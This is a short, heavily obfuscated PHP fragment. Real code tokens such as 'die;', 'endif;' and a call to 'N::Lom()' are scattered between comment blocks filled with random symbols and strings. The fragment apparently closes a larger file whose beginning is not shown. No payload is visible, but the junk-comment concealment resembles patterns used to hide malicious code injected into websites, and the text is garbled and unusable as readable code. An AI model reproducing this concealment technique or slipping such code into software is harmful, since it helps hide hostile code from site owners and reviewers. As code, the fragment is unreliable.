7+1/*-


∢╀


,k~K,∢╀


-*///
]/*-Jf;`1U-*///
);/*-

☓﹏

$ETvP☓﹏

-*///
/*-
▪≄◼✞ℂ◷•✜↱≯↕∙▴✣♋⇗⊻‹#
S|)=Ty~#K7▪≄◼✞ℂ◷•✜↱≯↕∙▴✣♋⇗⊻‹#
-*///
die;/*-
◿ⅿøⒽ✣⒗✏∴▓╍ⓥ↰ⓨ㊍〓≩✳
eS2:JBb◿ⅿøⒽ✣⒗✏∴▓╍ⓥ↰ⓨ㊍〓≩✳
-*///
 endif;/*-


⋂ⅷ✻➳£➸ℂ●➏≟⋑㊢ﭢ⓷㊎♘⒭✩


`U&W⋂ⅷ✻➳£➸ℂ●➏≟⋑㊢ﭢ⓷㊎♘⒭✩


-*///
 }/*-_QtN|nRj-*///
}/*-

⒚╟≠┿﹎ϡ↝⋥㊉╓⋩㈦╠◄⒖❉⇃Ⓐ¶⒨︸囍☳ⓠ♪%Ю↪∋

ha5AuD<V!P⒚╟≠┿﹎ϡ↝⋥㊉╓⋩㈦╠◄⒖❉⇃Ⓐ¶⒨︸囍☳ⓠ♪%Ю↪∋

-*///
N/*-

︾Ⓨ❣➼◔↵⇢㊌㊆ℎ✚↩≾⓪∞⊐∉⊋➬↰∋ℑ☟✡ℨ◺

Y{}wk`DvJ︾Ⓨ❣➼◔↵⇢㊌㊆ℎ✚↩≾⓪∞⊐∉⊋➬↰∋ℑ☟✡ℨ◺

-*///
::/*-
⋄☻◒≩⅓⊑♂Ⓓ║⏢
hgj⋄☻◒≩⅓⊑♂Ⓓ║⏢
-*///
Lom/*-Nd-*///
();/*-

✡┭❿ⓒℌღ℮㊁➌↯⒏

v44A^✡┭❿ⓒℌღ℮㊁➌↯⒏

-*///
 ?>